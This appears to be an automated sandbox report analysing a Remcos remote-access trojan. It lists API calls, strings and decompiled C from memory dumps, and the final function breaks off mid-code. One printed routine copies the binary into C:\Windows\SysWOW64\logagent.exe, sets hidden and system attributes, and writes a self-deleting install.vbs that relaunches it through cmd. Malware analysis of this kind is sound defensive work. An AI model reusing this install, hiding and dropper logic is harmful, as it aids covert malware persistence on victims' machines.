0x00401bc4
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401ACC
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AF3
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B02
WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B12
WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B22
WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B31
WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B40
WriteFile.KERNEL32(00000000,0046BA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B50
WriteFile.KERNEL32(00000000,0046BA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B60
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B6F
WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B7E
WriteFile.KERNEL32(00000000,0046BAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B8E
WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B9E
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401BAD

Strings

data, xrefs: 00401B98
WAVE, xrefs: 00401B0C
RIFF, xrefs: 00401AED
fmt , xrefs: 00401B1C

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: b88aaf6fd4ae18e9db3e7edb62172b1f03b106a838d8e35c764a4ab3da7406ab
Instruction ID: 7cb0b37bd81af4d905286dd476bd08579b6e0b57ecfaa18f48c35616be89f383
Opcode Fuzzy Hash: b88aaf6fd4ae18e9db3e7edb62172b1f03b106a838d8e35c764a4ab3da7406ab
Instruction Fuzzy Hash: DE413DB1A50218BAE710DA918C86FFFBBBCDB45B50F500066FB04EA0C0D7B45A05DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040A987, Relevance: 33.6, APIs: 7, Strings: 12, Instructions: 324
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040A987(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
				char _v9;
				int _v20;
				char _v44;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				char _v164;
				char _v188;
				char _v212;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				void* _t63;
				signed int _t67;
				signed int _t68;
				int _t70;
				void* _t79;
				void* _t91;
				void* _t92;
				int _t94;
				void* _t99;
				void* _t100;
				WCHAR* _t113;
				int _t115;
				intOrPtr _t118;
				WCHAR* _t123;
				int _t124;
				void* _t139;
				intOrPtr* _t152;
				int _t153;
				intOrPtr* _t207;
				int _t208;
				intOrPtr* _t235;
				void* _t236;
				void* _t239;
				void* _t249;
				void* _t250;
				intOrPtr _t254;
				void* _t257;
				void* _t259;
				intOrPtr* _t260;

				_t235 = __edx;
				_v9 = __ecx;
				_t260 = __edx;
				_v20 = 0;
				_t257 = __edx + 2;
				do {
					_t62 =  *_t235;
					_t235 = _t235 + 2;
				} while (_t62 != 0);
				_t236 = _t235 - _t257;
				_t268 = _t236;
				if(_t236 == 0) {
					_t143 = _a4;
					_t238 = __ecx;
					_t63 = E0041805B( &_v92, __ecx, _t143);
					_t259 = 0x46c500;
					L00401EFA(0x46c500, _t238, _t260, _t63);
				} else {
					CreateDirectoryW(L00401EEB(0x46c530), 0);
					_t143 = _a4;
					_t139 = E004030A6(_t143,  &_v92, E00407514( &_v44, 0x46c530, _t268, "\\"), 0x46c530, _t268, _t143);
					_t259 = 0x46c500;
					L00401EFA(0x46c500, _t138, _t260, _t139);
					L00401EF0();
				}
				L00401EF0();
				_t152 = L00401EEB(_t259);
				_t67 = 0x46bb08;
				while(1) {
					_t239 =  *_t67;
					if(_t239 !=  *_t152) {
						break;
					}
					if(_t239 == 0) {
						L10:
						_t153 = 0;
						_t68 = 0;
						L12:
						if(_t68 != 0) {
							_t70 = CopyFileW("C:\Windows\SysWOW64\logagent.exe", L00401EEB(_t259), _t153);
							__eflags = _t70;
							if(_t70 != 0) {
								L23:
								E0040A896(0x46c4e8, L00401EEB(0x46c4e8));
								__eflags = _a8 - 1;
								_pop(_t157);
								if(__eflags != 0) {
									L28:
									E004030A6(_t143,  &_v92, E0040427F(_t143,  &_v68, E0043987F(_t143, _t157, __eflags, L"Temp")), _t259, __eflags, L"\\install.vbs");
									L00401EF0();
									E0040427F(_t143,  &_v44, L"WScript.Sleep 1000\n");
									E0040766C(_t143,  &_v44, _t259, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
									__eflags = _a12 - 1;
									_t144 = "\n";
									if(__eflags == 0) {
										_t100 = E0040427F("\n",  &_v212, "C:\Windows\SysWOW64\logagent.exe");
										E00403311(E004030A6(_t144,  &_v68, E004030A6(_t144,  &_v116, E00403030( &_v140, E004030A6(_t144,  &_v164, E0040427F("\n",  &_v188, L"fso.DeleteFile "), _t259, __eflags, "\""), _t100), _t259, __eflags, "\""), _t259, __eflags, _t144));
										L00401EF0();
										L00401EF0();
										L00401EF0();
										L00401EF0();
										L00401EF0();
										L00401EF0();
									}
									_t79 = E0040427F(_t144,  &_v116, L"\"\"\", 0");
									E00403311(E004030A6(_t144,  &_v212, E00403030( &_v188, E00404429(_t144,  &_v164, E0040427F(_t144,  &_v68, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), __eflags, _t259), _t79), _t259, __eflags, _t144));
									L00401EF0();
									L00401EF0();
									L00401EF0();
									L00401EF0();
									L00401EF0();
									E0040766C(_t144,  &_v44, _t259, L"fso.DeleteFile(Wscript.ScriptFullName)");
									_t91 = L00401EEB( &_v92);
									_t92 = E00402489();
									_t94 = E00417947(L00401EEB( &_v44), _t92 + _t92, _t91, 0);
									__eflags = _t94;
									if(_t94 == 0) {
										L33:
										L00401EF0();
										return L00401EF0();
									} else {
										_t99 = ShellExecuteW(0, L"open", L00401EEB( &_v92), 0x45f724, 0x45f724, 0);
										__eflags = _t99 - 0x20;
										if(_t99 <= 0x20) {
											goto L33;
										}
										ExitProcess(0);
									}
								}
								_t113 = L00401EEB(_t259);
								_t143 = SetFileAttributesW;
								SetFileAttributesW(_t113, 7);
								_t249 = _t260 + 2;
								_t157 = 0;
								__eflags = 0;
								do {
									_t115 =  *_t260;
									_t260 = _t260 + 2;
									__eflags = _t115;
								} while (_t115 != 0);
								__eflags = _t260 - _t249;
								if(__eflags != 0) {
									_t157 = 0x46c530;
									SetFileAttributesW(L00401EEB(0x46c530), 7);
								}
								goto L28;
							}
							__eflags = _v9 - 0x36;
							if(_v9 == 0x36) {
								goto L23;
							}
							_t207 = _t260;
							_t250 = _t207 + 2;
							do {
								_t118 =  *_t207;
								_t207 = _t207 + 2;
								__eflags = _t118 - _v20;
							} while (_t118 != _v20);
							_t208 = _t207 - _t250;
							__eflags = _t208;
							_push(_t143);
							if(_t208 == 0) {
								L00401EFA(_t259, 0x36, _t260, E0041805B( &_v68, 0x36));
							} else {
								L00401EFA(_t259, _t128, _t260, E004030A6(_t143,  &_v140, E004030A6(_t143,  &_v116, E0041805B( &_v68, 0x36, _t260), _t259, __eflags, "\\"), _t259, __eflags));
								L00401EF0();
								L00401EF0();
							}
							L00401EF0();
							_t123 = L00401EEB(_t259);
							_t143 = 0x46bb08;
							_t124 = CopyFileW(0x46bb08, _t123, 0);
							__eflags = _t124;
							if(_t124 != 0) {
								goto L23;
							} else {
								L00409DC9(0x46bb08, _t259, 0x46bb08);
								return 0;
							}
						}
						E0040A896(0x46c4e8, L00401EEB(0x46c4e8));
						return 1;
					}
					_t254 =  *((intOrPtr*)(_t67 + 2));
					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
						break;
					}
					_t67 = _t67 + 4;
					_t152 = _t152 + 4;
					if(_t254 != 0) {
						continue;
					}
					goto L10;
				}
				asm("sbb eax, eax");
				_t68 = _t67 | 0x00000001;
				_t153 = 0;
				__eflags = 0;
				goto L12;
			}

0x0040a987
0x0040a994
0x0040a998
0x0040a99a
0x0040a99d
0x0040a9a0
0x0040a9a0
0x0040a9a3
0x0040a9a6
0x0040a9ab
0x0040a9ab
0x0040a9b4
0x0040a9fe
0x0040aa01
0x0040aa07
0x0040aa0d
0x0040aa15
0x0040a9b6
0x0040a9bf
0x0040a9c5
0x0040a9de
0x0040a9e4
0x0040a9ec
0x0040a9f4
0x0040a9f9
0x0040aa1d
0x0040aa29
0x0040aa2b
0x0040aa30
0x0040aa30
0x0040aa36
0x00000000
0x00000000
0x0040aa3b
0x0040aa52
0x0040aa52
0x0040aa54
0x0040aa5f
0x0040aa61
0x0040aa8b
0x0040aa91
0x0040aa93
0x0040ab42
0x0040ab4e
0x0040ab53
0x0040ab58
0x0040ab59
0x0040ab92
0x0040abb0
0x0040abb9
0x0040abc6
0x0040abd3
0x0040abd8
0x0040abdc
0x0040abe1
0x0040abf9
0x0040ac46
0x0040ac4e
0x0040ac56
0x0040ac61
0x0040ac6c
0x0040ac77
0x0040ac82
0x0040ac82
0x0040ac90
0x0040acd2
0x0040acdd
0x0040ace8
0x0040acf3
0x0040acfb
0x0040ad03
0x0040ad10
0x0040ad1b
0x0040ad24
0x0040ad39
0x0040ad40
0x0040ad42
0x0040ad6d
0x0040ad70
0x00000000
0x0040ad44
0x0040ad5b
0x0040ad61
0x0040ad64
0x00000000
0x00000000
0x0040ad67
0x0040ad67
0x0040ad42
0x0040ab5f
0x0040ab64
0x0040ab6b
0x0040ab6d
0x0040ab70
0x0040ab70
0x0040ab72
0x0040ab72
0x0040ab75
0x0040ab78
0x0040ab78
0x0040ab7d
0x0040ab81
0x0040ab85
0x0040ab90
0x0040ab90
0x00000000
0x0040ab81
0x0040aa99
0x0040aa9d
0x00000000
0x00000000
0x0040aaa3
0x0040aaa5
0x0040aaa8
0x0040aaa8
0x0040aaab
0x0040aaae
0x0040aaae
0x0040aab4
0x0040aab4
0x0040aaba
0x0040aabe
0x0040ab0b
0x0040aac0
0x0040aae8
0x0040aaf3
0x0040aafb
0x0040aafb
0x0040ab13
0x0040ab1d
0x0040ab23
0x0040ab29
0x0040ab2f
0x0040ab31
0x00000000
0x0040ab33
0x0040ab36
0x00000000
0x0040ab3b
0x0040ab31
0x0040aa6f
0x00000000
0x0040aa76
0x0040aa3d
0x0040aa45
0x00000000
0x00000000
0x0040aa47
0x0040aa4a
0x0040aa50
0x00000000
0x00000000
0x00000000
0x0040aa50
0x0040aa58
0x0040aa5a
0x0040aa5d
0x0040aa5d
0x00000000

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A9BF
CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000,00000000,00000000), ref: 0040AA8B
CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000,00000000,00000000), ref: 0040AB29

Part of subcall function 0041805B: GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2

SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB6B
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB90
ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040AD5B
ExitProcess.KERNEL32 ref: 0040AD67

Strings

\install.vbs, xrefs: 0040AB92
""", 0, xrefs: 0040AC88
6, xrefs: 0040AA99
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040ABCB
fso.DeleteFile , xrefs: 0040AC00
C:\Windows\SysWOW64\logagent.exe, xrefs: 0040AA2B, 0040AA86, 0040AB23, 0040AB28, 0040AB33, 0040ABF4
open, xrefs: 0040AD55
WScript.Sleep 1000, xrefs: 0040ABBE
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040AC97
Temp, xrefs: 0040AB97
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040AD08
Remcos, xrefs: 0040AA63, 0040AB42

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$AttributesCopy$CreateDirectoryExecuteExitLongNamePathProcessShell
String ID: """, 0$6$C:\Windows\SysWOW64\logagent.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
API String ID: 4018752923-3679637522
Opcode ID: 9e18b3c0e184d6d4754112488a75fef8ecf5ae8d24948dbe7ae8a1902eb8dbf7
Instruction ID: 190cd27c0b7bf58ebe4b0d8389cb7e98ba8e890002f8b4040f3ff986190cfdad
Opcode Fuzzy Hash: 9e18b3c0e184d6d4754112488a75fef8ecf5ae8d24948dbe7ae8a1902eb8dbf7
Instruction Fuzzy Hash: C4A1637160020456CB28FBA5DC92AFF737AAF54344F54407FF806B61D2EE386E46C66A

Uniqueness

Uniqueness Score: -1.00%

Function 004476AD, Relevance: 27.4, APIs: 18, Instructions: 419
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004476AD(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = L00434F60(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E0043A504())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x46b4d0; // 0x3029b80
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x46b4dc; // 0x3029b80
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x46b4d0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = L00447D55(_t298);
												E004401F5(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										E004401F5( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = L00447D55(_t298);
											E004401F5(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x46b4d0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = E0043F348(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												E004401F5(_t300);
												goto L12;
											} else {
												_t131 = E00441916(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E0043698A();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = L00450FF7(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E0043A504())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x46b4d4; // 0x3029ce0
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x46b4d8; // 0x3029fa0
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x46b4d4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = L00447CE8(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = L00447D55(_t302);
																					E004401F5(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			E004401F5( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = L00447D55(_t302);
																				E004401F5(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x46b4d4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = E0043F348(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					E004401F5(_t304);
																					goto L56;
																				} else {
																					_t148 = E004415D4(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E0043698A();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t305 = E0043F348(_t260, _t260 + 1, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E0043F949(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									E004401F5(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t284 = _t271 + 1;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_v16 = _t262 + 1;
																										 *(_t221 + _t290) = E0043F348(_t262, _t262 + 1, 1);
																										E004401F5(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E00441916( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E0043698A();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t306 = E0043F348(_t263, _t263 + 1, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E0043F949(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															E004401F5(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t284 = _t267 + 2;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_v24 = (_t267 - _t284 >> 1) + 1;
																																 *(_t223 + _t291) = E0043F348(_t267 - _t284 >> 1, (_t267 - _t284 >> 1) + 1, 2);
																																E004401F5(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E004415D4( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E0043698A();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x46b4d0;
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E004444C3(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E0043A504();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x46b4d0; // 0x3029b80
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x46b4d4 = E0043F348(_t246, 1, 4);
																				E004401F5(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x46b4d0 = E0043F348(_t246, 1, 4);
																				E004401F5(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x46b4d0 - _t221; // 0x3029b80
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x46b4d4; // 0x3029ce0
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0043D3FB(_t221);
